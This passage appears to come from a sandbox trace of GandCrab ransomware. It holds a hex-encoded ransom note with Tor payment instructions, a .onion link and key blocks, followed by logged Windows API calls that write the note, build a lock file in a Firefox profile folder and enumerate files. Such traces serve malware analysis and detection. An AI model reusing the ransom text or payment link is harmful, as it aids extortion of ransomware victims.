\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0082.217] WriteFile (in: hFile=0x2d4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e590, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e590*=0x2162, lpOverlapped=0x0) returned 1 [0082.217] CloseHandle (hObject=0x2d4) returned 1 [0082.217] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.218] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0082.218] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1b, wMilliseconds=0x212)) [0082.218] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000 [0082.218] GetWindowsDirectoryW (in: lpBuffer=0x2310000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0082.218] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2310200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2310600, lpMaximumComponentLength=0x2310608, lpFileSystemFlags=0x2310604, lpFileSystemNameBuffer=0x2310400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2310600*=0xd2ca4def, lpMaximumComponentLength=0x2310608*=0xff, lpFileSystemFlags=0x2310604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0082.218] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock") returned 120 [0082.218] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\gmp-gmpopenh264\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2d4 [0082.220] VirtualFree (lpAddress=0x2310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.220] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.220] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\") returned 96 [0082.220] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*" [0082.220] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\gmp-gmpopenh264\\*", fInfoLevelId=0x1, lpFindFileData=0x259e5ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e5ac) returned 0x503578 [0082.220] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.220] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.221] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.221] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.221] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259e5ac | out: lpFindFileData=0x259e5ac) returned 1 [0082.221] lstrcmpW (lpString1="1.6", lpString2=".") returned 1 [0082.222] lstrcmpW (lpString1="1.6", lpString2="..") returned 1 